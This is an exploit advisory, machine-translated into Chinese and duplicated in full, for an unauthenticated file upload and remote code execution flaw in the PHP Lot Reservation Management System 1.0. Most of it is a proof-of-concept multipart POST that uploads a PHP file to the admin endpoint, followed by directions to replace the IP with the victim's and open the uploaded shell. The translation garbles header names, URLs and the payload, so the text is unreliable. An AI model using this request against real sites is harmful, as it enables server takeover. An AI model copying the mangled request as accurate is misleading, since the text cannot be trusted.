#利用标题:批次保留管理系统未经验证的文件上传和远程代码执行
#Google Dork: N/A
#DATE: 2023年12月10日
#利用作者: Elijah Mandila Syoyi
#供应商homepage3360 https://www.sourcecodester.com/php/...ource-source-source-source-source-source.html
#软件link: https://ww.sourcecodester.com/sites...-restreation-management-management-system.zip
#版本: 1.0
#在: Microsoft Windows 11 Enterprise和XAMPP 3.3.0测试
#CVE : N/A
开发人员有关应用程序目的的描述:-
------------------------------------------------------------------------------------------------------------------------------------------------------------------
关于
LOT预订管理系统是一个简单的PHP/Mysqli项目,它将有助于某些细分,公寓或任何出售土地财产或房屋和地段的业务。该系统将帮助上述行业或公司提供有关其销售财产的可能客户信息,同时,可能的客户可以保留其所需的财产。客户的Lot Reserve System网站具有用户友好的功能,并且显示的内容可以由管理层动态管理。该系统允许管理层上传区域映射,并且通过此功能,系统管理员或员工将填充他们要出售的地段,房屋模型或属性的列表,以允许可能的客户选择所需的区域。地图将分为建筑物属性的每个划分,例如某个细分的阶段1-5,这些阶段中的每个阶段都将在系统中单独编码,并显示每个属性或批次的划分的地图图像。
------------------------------------------------------------------------------------------------------------------------------------------------------------------
脆弱性:-
在上传文件之前,该应用程序无法正确验证身份验证信息和文件类型。这可以允许攻击者绕过身份验证和文件检查并将恶意文件上传到服务器。有一个打开的目录列表,其中存储上传的文件,允许攻击者在PHP中打开恶意文件,并将由服务器执行。
概念证明:-
(HTTP POST请求)
post/lot/admin/ajax.php?action=save_division http/1.1
HOST: 192.168.150.228
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;边界=---------------------------------- 21798406623659696565684247013027
内容长度: 606
Origin: http://192.168.150.228
连接:关闭
Referer: http://192.168.150.228/lot/admin/index.php?page=divisions
------------------------------------ 21798406623659696565684247013027
content-disposition: form-data;名称='id'
------------------------------------ 21798406623659696565684247013027
content-disposition: form-data;名称='名称'
样本
------------------------------------ 21798406623659696565684247013027
content-disposition: form-data;名称='描述'
样本
------------------------------------ 21798406623659696565684247013027
content-disposition: form-data;名称='img';文件名='phpinfo.php'
content-type:应用程序/x-php
php phpinfo()?
------------------------------------- 21798406623659696565684247013027-
在'http://192.168.150.228/lot/admin/action/Assets/uploads/maps/'中检查您上传的文件/壳。用受害者IP地址替换IP地址。
#Google Dork: N/A
#DATE: 2023年12月10日
#利用作者: Elijah Mandila Syoyi
#供应商homepage3360 https://www.sourcecodester.com/php/...ource-source-source-source-source-source.html
#软件link: https://ww.sourcecodester.com/sites...-restreation-management-management-system.zip
#版本: 1.0
#在: Microsoft Windows 11 Enterprise和XAMPP 3.3.0测试
#CVE : N/A
开发人员有关应用程序目的的描述:-
------------------------------------------------------------------------------------------------------------------------------------------------------------------
关于
LOT预订管理系统是一个简单的PHP/Mysqli项目,它将有助于某些细分,公寓或任何出售土地财产或房屋和地段的业务。该系统将帮助上述行业或公司提供有关其销售财产的可能客户信息,同时,可能的客户可以保留其所需的财产。客户的Lot Reserve System网站具有用户友好的功能,并且显示的内容可以由管理层动态管理。该系统允许管理层上传区域映射,并且通过此功能,系统管理员或员工将填充他们要出售的地段,房屋模型或属性的列表,以允许可能的客户选择所需的区域。地图将分为建筑物属性的每个划分,例如某个细分的阶段1-5,这些阶段中的每个阶段都将在系统中单独编码,并显示每个属性或批次的划分的地图图像。
------------------------------------------------------------------------------------------------------------------------------------------------------------------
脆弱性:-
在上传文件之前,该应用程序无法正确验证身份验证信息和文件类型。这可以允许攻击者绕过身份验证和文件检查并将恶意文件上传到服务器。有一个打开的目录列表,其中存储上传的文件,允许攻击者在PHP中打开恶意文件,并将由服务器执行。
概念证明:-
(HTTP POST请求)
post/lot/admin/ajax.php?action=save_division http/1.1
HOST: 192.168.150.228
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT: /
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
X-重新要求- WITH: XMLHTTPREQUEST
content-type:多部分/form-data;边界=---------------------------------- 21798406623659696565684247013027
内容长度: 606
Origin: http://192.168.150.228
连接:关闭
Referer: http://192.168.150.228/lot/admin/index.php?page=divisions
------------------------------------ 21798406623659696565684247013027
content-disposition: form-data;名称='id'
------------------------------------ 21798406623659696565684247013027
content-disposition: form-data;名称='名称'
样本
------------------------------------ 21798406623659696565684247013027
content-disposition: form-data;名称='描述'
样本
------------------------------------ 21798406623659696565684247013027
content-disposition: form-data;名称='img';文件名='phpinfo.php'
content-type:应用程序/x-php
php phpinfo()?
------------------------------------- 21798406623659696565684247013027-
在'http://192.168.150.228/lot/admin/action/Assets/uploads/maps/'中检查您上传的文件/壳。用受害者IP地址替换IP地址。